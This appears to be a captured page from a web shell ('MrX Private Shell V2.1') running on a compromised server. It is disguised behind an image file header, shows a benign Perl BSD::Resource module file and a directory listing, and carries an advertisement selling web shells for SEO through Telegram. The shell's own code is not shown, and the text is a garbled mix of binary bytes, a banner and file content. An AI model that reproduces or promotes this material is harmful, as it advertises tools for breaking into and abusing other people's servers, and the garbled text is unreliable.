����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# NOTE: Derived from blib/lib/BSD/Resource.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package BSD::Resource;
#line 556 "blib/lib/BSD/Resource.pm (autosplit into blib/lib/auto/BSD/Resource/getrusage.al)"
sub getrusage (;$) {
my @rusage = _getrusage(@_);
if (wantarray) {
@rusage;
} else {
my $rusage = {};
my $key;
for $key (qw(utime stime maxrss ixrss idrss isrss minflt majflt nswap
inblock oublock msgsnd msgrcv nsignals nvcsw nivcsw)) {
$rusage->{$key} = shift(@rusage);
}
bless $rusage;
}
}
# end of BSD::Resource::getrusage
1;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Resource.so | File | 19.57 KB | 0755 |
|
| _find_prio.al | File | 575 B | 0644 |
|
| _find_rlimit.al | File | 591 B | 0644 |
|
| _g.al | File | 369 B | 0644 |
|
| autosplit.ix | File | 619 B | 0644 |
|
| get_prios.al | File | 324 B | 0644 |
|
| get_rlimits.al | File | 332 B | 0644 |
|
| getpriority.al | File | 539 B | 0644 |
|
| getrlimit.al | File | 468 B | 0644 |
|
| getrusage.al | File | 615 B | 0644 |
|
| hard.al | File | 308 B | 0644 |
|
| idrss.al | File | 315 B | 0644 |
|
| inblock.al | File | 319 B | 0644 |
|
| isrss.al | File | 315 B | 0644 |
|
| ixrss.al | File | 315 B | 0644 |
|
| majflt.al | File | 317 B | 0644 |
|
| maxrss.al | File | 317 B | 0644 |
|
| minflt.al | File | 317 B | 0644 |
|
| msgrcv.al | File | 317 B | 0644 |
|
| msgsnd.al | File | 317 B | 0644 |
|
| nivcsw.al | File | 318 B | 0644 |
|
| nsignals.al | File | 321 B | 0644 |
|
| nswap.al | File | 315 B | 0644 |
|
| nvcsw.al | File | 315 B | 0644 |
|
| oublock.al | File | 319 B | 0644 |
|
| setpriority.al | File | 607 B | 0644 |
|
| setrlimit.al | File | 423 B | 0644 |
|
| soft.al | File | 307 B | 0644 |
|
| stime.al | File | 315 B | 0644 |
|
| times.al | File | 476 B | 0644 |
|
| utime.al | File | 315 B | 0644 |
|